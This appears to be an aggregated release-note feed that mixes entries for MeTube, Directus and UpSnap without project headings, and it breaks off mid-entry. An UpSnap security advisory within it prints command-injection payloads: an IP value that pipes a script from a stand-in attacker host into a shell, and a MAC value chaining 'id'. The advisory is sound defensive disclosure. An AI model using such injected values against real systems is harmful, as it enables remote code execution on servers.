Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.05.30

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.05.30

Changes

• styling improvements (897d52c)

⚠️ Potential Breaking Changes

Introduced VERSION_KEY_ constants and renamed main to published @alvarosabu (#27397)*
Backward Compatibility: You can now use ?version=published to resolve versions of the main item(s) via the version query parameter. For backward compatibility, ?version=main will continue to work.

Replaced status field with archived boolean in collection settings @alvarosabu (#27397)
Backward Compatibility: Existing collections with string-based status fields continue to work unchanged; newly created collections now default to a boolean "Archived" field instead of the string "Status" field

Deprecated the VResizeable component @formfcw (#27437)

• Deprecation for extensions: The globally registered VResizeable component has been deprecated. Extension authors using <v-resizeable> should migrate to @directus/vue-split-panel or their own implementation.

Updated type system, borders, and theme variables @formfcw (#27437)

• Potential breaking change for theme extensions: headerShadow and sidebarShadow removed from LayoutConfig interface
• Potential breaking change for theme extensions: boxShadow removed from header theme rules schema
• Potential breaking change for theme extensions: sidebarShadow no longer exposed in layout wrapper state

Updated module navigation bar spacing and styling @HZooly (#27437)

• Potential breaking change in theme extensions: Removed navigation.project.borderColor / navigation.project.borderWidth / navigation.project.background from theming. No action is required — these props will simply no longer have any effect.

Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397)

• Breaking change — new behavior for versioned collections Published items in versioned collections are now locked. Edits must be made through the draft version.

Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437)

• Potential breaking change for extensions: The rounded prop has been removed from v-button. Extensions using rounded will still render correctly but buttons will appear as rounded rectangles instead of circles. No functional impact.

Changed license to MSCL-1.0-GPL (#27417)

• Breaking Change: Relicensed from BUSL-1.1 to MSCL-1.0-GPL (Monospace Sustainable Core License, Version 1.0).

Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437)

• Potential breaking change for theme extensions: The theme properties navigation.background, navigation.backgroundAccent, navigation.borderWidth, navigation.borderColor, header.background, header.borderWidth, and header.borderColor have been removed and replaced by shell.background, shell.backgroundAccent, shell.borderWidth, and shell.borderColor.
• Potential breaking change for theme extensions: Custom themes overriding any of these removed properties must migrate to the new shell scope. The corresponding CSS variables change from --theme--navigation--background, --theme--navigation--background-accent, --theme--navigation--border-*, --theme--header--background, and --theme--header--border-* to --theme--shell--background, --theme--shell--background-accent, and --theme--shell--border-*.

Removed the extra confirmation step from the publish flow @alvarosabu (#27487)

• Breaking change — new publish flow: Publishing a version no longer shows an additional confirmation dialog after confirming changes in the comparison modal. The item is published directly once the changes are confirmed.

Updated sidebar styles @formfcw (#27437)

• Potential breaking change for theme extensions: Removed section.toggle.borderWidth / section.toggle.borderColor in favor of section-level border tokens. No action is required — these props will simply no longer have any effect.
• Potential breaking change for theme extensions: Removed sidebarShadow and headerShadow from defineLayout(). No action is required — these props will simply no longer have any effect.

Refactored focus ring from border/box-shadow to outline @formfcw (#27437)

• Potential breaking change for theme extensions: borderColorFocus, boxShadowHover, and boxShadowFocus are removed from the theme schema — custom themes referencing these will lose their focus overrides silently
• Potential breaking change for interface extensions that relied on --theme--form--field--input--border-color-focus or --theme--form--field--input--box-shadow-focus CSS variables will need to migrate to --theme--form--field--input--focus-ring-color

Updated header bar elements and deprecated the headline slot @formfcw (#27437)

• Deprecation for extensions: The headline slot on the private view header bar has been deprecated. Existing content keeps rendering, but consumers using <template #headline> will now see a deprecation hint from Volar.

Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607)
The IP_TRUST_PROXY default was changed from true to false. If you run Directus behind a reverse proxy and rely on X-Forwarded-For (or similar) headers for client IP resolution, you must now explicitly set IP_TRUST_PROXY to true or a more specific trust configuration.

• @directus/app
  • Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397 by @formfcw)
  • Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437 by @formfcw)
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
  • Removed the extra confirmation step from the publish flow @alvarosabu (#27487 by @alvarosabu)
• @directus/api
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/themes

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

• @directus/types

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

• @directus/extensions
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/extensions-registry
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/extensions-sdk
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/format-title
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/memory
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/pressure
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/release-notes-generator
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/update-check
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/validation
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/schema
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/schema-builder
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/specs
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-cloudinary
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-supabase
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-azure
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-gcs
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-local
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-s3
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/stores
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• create-directus-extension
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• create-directus-project
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/env
  • Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607 by @br41nslug)
• @directus/sdk

  • Refactor sdk error to use class over object (#27417 by @ComfortablyCoding)

    :::warning
    Requests that fail will now throw a RequestError instead of returning a response with an error property.
    :::

✨ New Features & Improvements

• @directus/app

  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)

  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)

  • Fixed Image Editor save button to use split button @HZooly (#27437 by @formfcw)

  • Added split-menu slot to v-button and migrate primary header actions @formfcw (#27437 by @formfcw)

  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)

  • Added version support to getItemRoute and update all callers to preserve version context when navigating to items from layouts and interfaces @alvarosabu (#27397 by @formfcw)

  • Added behavior to auto-switch to the draft version on the first edit of published item @alvarosabu (#27507 by @alvarosabu)

  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)

  • Updated Visual Editor header bar buttons @formfcw (#27437 by @formfcw)

  • Updated content route middleware to handle singleton collections and draft flow via route guards @alvarosabu (#27397 by @formfcw)

  • Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)

  • Updated module bar buttons style @HZooly (#27437 by @formfcw)

  • Deprecated the VResizeable component @formfcw (#27437 by @formfcw)

  • Updated VChip component to appear as a pill in form field label, group accordion, group tabs, kanban, deployment status, extension item, marketplace extension list item, marketplace extension banner, and user popover @formfcw (#27462 by @formfcw)

  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)

  • Rendered non-clickable version menu without directus_versions read access @alvarosabu (#27461 by @alvarosabu)

  • Added item-less draft creation flow for versioned collections @alvarosabu (#27397 by @formfcw)

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated Visual Editor popover/modal action buttons @formfcw (#27437 by @formfcw)

  • Updated UI for the Draft & Publish workflow @formfcw (#27437 by @formfcw)

  • Updated mobile appearance of drawer sidebar @formfcw (#27437 by @formfcw)

  • Moved Promote/Publish button to header actions @alvarosabu (#27397 by @formfcw)

  • Updated primary header actions to show label and replace outlined header action buttons @formfcw (#27437 by @formfcw)

  • Updated SearchInput component to match the new design @formfcw (#27437 by @formfcw)

  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)

  • Refactored header bar action slots and reorganized CTAs @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The actions:append slot in the header bar has been deprecated in favor of the new actions:primary slot for primary CTAs. Existing actions:append usage keeps rendering in the secondary-actions zone, but consumers will now see a deprecation hint from Volar.

    :::

  • Added navigation logic on discarding item-less versions @alvarosabu (#27397 by @formfcw)

  • Put the sidebar into the content area @HZooly (#27437 by @formfcw)

  • Updated color system for VChip and VersionMenu components @formfcw (#27437 by @formfcw)

  • Updated content section spacing and drawer content spacing @HZooly (#27437 by @formfcw)

  • Extracted the card subheader into a reusable subheader component @HZooly (#27437 by @formfcw)

  • Added version select to collection page @alvarosabu (#27397 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Renamed "Promote" to "Publish" in version menu and disabled create version and published selection for item-less versions @alvarosabu (#27397 by @formfcw)

  • Added version query param guards on content-item route @alvarosabu (#27397 by @formfcw)

  • Improved bookmark flow @formfcw (#27450 by @formfcw)

  • Forwarded theme tokens and i18n strings from Studio to the visual-editing iframe @formfcw (#27469 by @formfcw)

  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)

  • Introduced VersionChip component @formfcw (#27437 by @formfcw)

  • Updated theme preview component to match the new design @formfcw (#27437 by @formfcw)

  • Updated collab avatar indicator design @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

  • Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)

  • Ensured to switch to the draft version when visually editing an item of a versioned collection @formfcw (#27595 by @formfcw)

  • Extracted reusable ModuleBarButton component @formfcw (#27437 by @formfcw)

  • Moved client-validation to promote version workflow instead of save version @alvarosabu (#27397 by @formfcw)

  • Added Create New action to publish split menu with shortcut @alvarosabu (#27425 by @alvarosabu)

• @directus/api
  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
• @directus/constants
  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
• @directus/env
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
• @directus/system-data
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
• @directus/types
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
• @directus/errors
  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
• @directus/composables
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Added version select to collection page @alvarosabu (#27397 by @formfcw)
• @directus/themes
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
  • Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)
• @directus/utils
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
• @directus/sdk
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
• @directus/specs
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
• @directus/visual-editing
  • Redesigned the editable-element overlay with theming, RTL support and improved a11y @formfcw (#27469 by @formfcw)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
  • Limited mobile sidebar width so the overlay can be tapped to close it @HZooly (#27437 by @formfcw)
  • Bumped vue-tsc to 3.1.8 (#27437 by @formfcw)
  • Fixed icon alignment in v-divider component @HZooly (#27437 by @formfcw)
  • Fixed v-dialog returning focus to opener instead of an autofocused child on close @formfcw (#27464 by @formfcw)
  • Fixed flow handle button alignment in flow editor @HZooly (#27437 by @formfcw)
  • Shown "Import in background" checkbox only when a file is selected @HZooly (#27437 by @formfcw)
  • Fixed sidebar reopening at minimum size after being collapsed via drag handle @HZooly (#27437 by @formfcw)
  • Fixed vue console warnings related to the comparison modal (#27538 by @formfcw)
  • Fixed misaligned filter editor in search bar @formfcw (#27454 by @formfcw)
  • Changed back button behavior, always navigates one level up @HZooly (#27437 by @formfcw)
  • Fixed repeater interface ignoring per-field translations and $t: keys on sub-field labels, and added a "Field Name Translations" section to the sub-field configuration UI (#27374 by @khanahmad4527)
  • Fixed calendar layout toolbar responsiveness @HZooly (#27437 by @formfcw)
  • Fixed items not being selectable in the collection drawer when the Kanban layout is used while the parent item is opened in a version context @alvarosabu (#27427 by @alvarosabu)
  • Fixed bookmark icon and color not showing in header @formfcw (#27437 by @formfcw)
  • Fixed UI freeze caused by WYSIWYG interface when its non-editable state toggles @formfcw (#27515 by @formfcw)
• @directus/api
  • Fixed registration email verification tokens to use the configured secret fallback when SECRET is missing. (#27406 by @rijkvanzanten)
  • Bumped axios, js-cookie, samlify, systeminformation, simple-git, fast-uri dependencies (#27589 by @br41nslug)
  • Fixed MCP OAuth dynamic client registration defaults and metadata responses. (#27628 by @hanneskuettner)
  • Updated IP blocking (#27606 by @br41nslug)
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/constants
  • Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
• @directus/system-data
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/types
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
• @directus/utils
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
• @directus/ai
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/release-notes-generator
  • Ignored private workspace packages when generating release notes (#27637 by @licitdev)

📦 Published Versions

• @directus/app@16.0.0-rc.0
• @directus/api@36.0.0-rc.0
• @directus/ai@1.3.2-rc.0
• @directus/composables@11.5.0-rc.0
• @directus/constants@14.4.0-rc.0
• create-directus-extension@12.0.0-rc.0
• create-directus-project@13.0.0-rc.0
• @directus/env@6.0.0-rc.0
• @directus/errors@2.4.0-rc.0
• @directus/extensions@4.0.0-rc.0
• @directus/extensions-registry@4.0.0-rc.0
• @directus/extensions-sdk@18.0.0-rc.0
• @directus/format-title@13.0.0-rc.0
• @directus/memory@4.0.0-rc.0
• @directus/pressure@4.0.0-rc.0
• @directus/release-notes-generator@3.0.0-rc.0
• @directus/schema@14.0.0-rc.0
• @directus/schema-builder@1.0.0-rc.0
• @directus/specs@14.0.0-rc.0
• @directus/storage@13.0.0-rc.0
• @directus/storage-driver-azure@13.0.0-rc.0
• @directus/storage-driver-cloudinary@13.0.0-rc.0
• @directus/storage-driver-gcs@13.0.0-rc.0
• @directus/storage-driver-local@13.0.0-rc.0
• @directus/storage-driver-s3@13.0.0-rc.0
• @directus/storage-driver-supabase@4.0.0-rc.0
• @directus/stores@3.0.0-rc.0
• @directus/system-data@4.5.0-rc.0
• @directus/themes@2.0.0-rc.0
• @directus/types@16.0.0-rc.0
• @directus/update-check@14.0.0-rc.0
• @directus/utils@13.5.0-rc.0
• @directus/validation@3.0.0-rc.0
• @directus/visual-editing@2.1.0-rc.0
• @directus/sdk@22.0.0-rc.0

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.05.29

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.05.29

Changes

• fix pnpm upgrade to the correct package age limit (baa72c0)
• review fixes (cf2d2dd)
• fix catch (56c0ad3)
• upgrade dependencies (4478d13)
• fix(ui): drop redundant tooltip on share button (ad92607)
• feat(ui): warn before share + surface failures for large files (6ff364a)
• feat(ui): add iOS Web Share button next to download link (39a8948)
• remove circle and make labels with help text have an underline (f034858)
• make ui more mobile mobile-friendly (e2773db)

New Setup Process

GHSA-w4jr-728f-5jhq

What changed

The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.

Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.

Why this was necessary

In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.

By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.

RCE via Device IP and MAC Address Injection

GHSA-6mc7-6948-w5h4

What was the issue

UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.

In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:

IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id

When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.

What was fixed

1. Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.

2. Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.

3. HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.

Who is affected

Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.

Changelog

Bug fixes

• 74633e7: fix: use token based superuser setup (@seriousm4x)
• 43f3f65: fix: validate ip and mac addresses to prevent RCE (@seriousm4x)

Others

• dfaf0ee: build(deps-dev): bump @sveltejs/kit from 2.59.1 to 2.60.1 in /frontend (@dependabot[bot])
• 8b08585: build(deps-dev): bump svelte from 5.55.5 to 5.55.7 in /frontend (@dependabot[bot])
• 92f9e29: update deps (@seriousm4x)

Changelog

Bug fixes

• 7b8bcfa: fix: switch cron-parser to named import (CronExpressionParser) (#1737) (@codeanish)

Changelog

Bug fixes

• 1a60020: fix: binding_property_non_reactive (@seriousm4x)
• 19daaf8: fix: eager fetch on device card (@seriousm4x)

Others

• 91fe074: Add i18n el-GR (#1734) (@nikmak88)
• 6aa2345: build(deps): bump cookie from 0.6.0 to 1.1.1 in /frontend (@dependabot[bot])
• 9494c34: update deps (@seriousm4x)

✨ New Features & Improvements

• @directus/app
  • Updated the token field on the user detail page to require confirmation before regenerating or removing a token, and saved those changes immediately without requiring a page-level save. (#27108 by @LZylstra)
• @directus/api
  • Added opt-in must-revalidate and ETag headers for assets via ASSETS_CACHE_REVALIDATE env var (#27027 by @gaetansenn)
  • Added a force option to schema apply to bypass hash check (#27136 by @Nitwel)
• @directus/env
  • Added opt-in must-revalidate and ETag headers for assets via ASSETS_CACHE_REVALIDATE env var (#27027 by @gaetansenn)
• @directus/sdk
  • Added a force option to schema apply to bypass hash check (#27136 by @Nitwel)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Fixed UI freeze when navigating items with WYSIWYG translations for non-admin users (#27154 by @gaetansenn)
  • Fixed selection not being cleared after running a manual flow from the collection list view sidebar (#27330 by @kropsi)
  • Fixed "Save as copy" in the file library throwing a 403 Forbidden error (#27181 by @sanskar-soni-9)
  • Fixed user token not being displayed after generation when collaboration is enabled (#27319 by @LZylstra)
  • Prevented filter popup being closed when reordering filters (#27324 by @HZooly)
  • Fixed icon flash in navigation sidebar for bookmarks without an icon (#27329 by @HZooly)
  • Migrated @directus/visual-editing into the monorepo (#27157 by @formfcw)
• @directus/api
  • Removed duplicate @directus/schema-builder dependency (#27166 by @ComfortablyCoding)
  • Bumped basic-ftp, liquidjs, xmldom, protobufjs, vite dependencies (#27335 by @br41nslug)
  • Fixed flows not awaiting reload (#27137 by @Nitwel)
  • Fixed VERSION_SAVE activity/revisions not respecting collection tracking settings (#27096 by @yogeshwaran-c)
  • Denied creating collections with / in name (#27114 by @costajohnt)
• @directus/types
  • Added a force option to schema apply to bypass hash check (#27136 by @Nitwel)
• @directus/visual-editing
  • Migrated @directus/visual-editing into the monorepo (#27157 by @formfcw)
  • Fixed the edit handler firing twice when clicking an overlay button directly (#27157 by @formfcw)
• @directus/utils
  • Migrated @directus/visual-editing into the monorepo (#27157 by @formfcw)
• @directus/sdk
  • Fixed SDK types linking to directus_access junction collection (#27152 by @yogeshwaran-c)
• @directus/composables
  • Fixed useShortcut attempting to access document before available (#27155 by @ComfortablyCoding)

📦 Published Versions

• @directus/app@15.10.0
• @directus/api@35.2.0
• @directus/composables@11.4.1
• create-directus-extension@11.0.36
• @directus/env@5.8.0
• @directus/extensions@3.0.25
• @directus/extensions-registry@3.0.26
• @directus/extensions-sdk@17.1.4
• @directus/memory@3.1.8
• @directus/pressure@3.0.22
• @directus/schema-builder@0.0.20
• @directus/storage-driver-azure@12.0.22
• @directus/storage-driver-cloudinary@12.0.22
• @directus/storage-driver-gcs@12.0.22
• @directus/storage-driver-s3@12.1.8
• @directus/storage-driver-supabase@3.0.22
• @directus/themes@1.3.3
• @directus/types@15.0.3
• @directus/utils@13.4.1
• @directus/validation@2.0.23
• @directus/visual-editing@2.0.1
• @directus/sdk@21.3.0
• @directus/sandbox@0.0.0

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.28

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.28

Changes

• allow filtering out members-only videos in subscriptions (closes #971) (5d96a58)

Changelog

Others

• cc605ac: Added shutdown group (#1732) (@mabbas007)
• b297f3a: Format pending countdown as MM:SS (#1727) (@phuonganh2601)
• af655d3: build(deps-dev): bump vite from 7.3.1 to 7.3.2 in /frontend (@dependabot[bot])
• 6df1205: update deps (@seriousm4x)

Github Actions

• aabd8c1: gh-action: bump dependabot/fetch-metadata from 2 to 3 (@dependabot[bot])
• 24e218b: gh-action: bump pnpm/action-setup from 5 to 6 (@dependabot[bot])

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.26

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.26

Changes

• implement time-clipped downloads (closes #969, replaces #907) (4f83174)
• title filter for subscriptions (closes #968) (91ee831)
• Bump aquasecurity/trivy-action in the github-actions group (d89a5dd)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.21

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.21

Changes

• upgrade dependencies (abb9492)
• cr fixes (23de982)
• Updated import and fixed race condition (0ea934c)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.18

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.18

Changes

• fix yt-dlp options overrides (closes #958) (e9f979b)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.16

GitHub Container Registry:

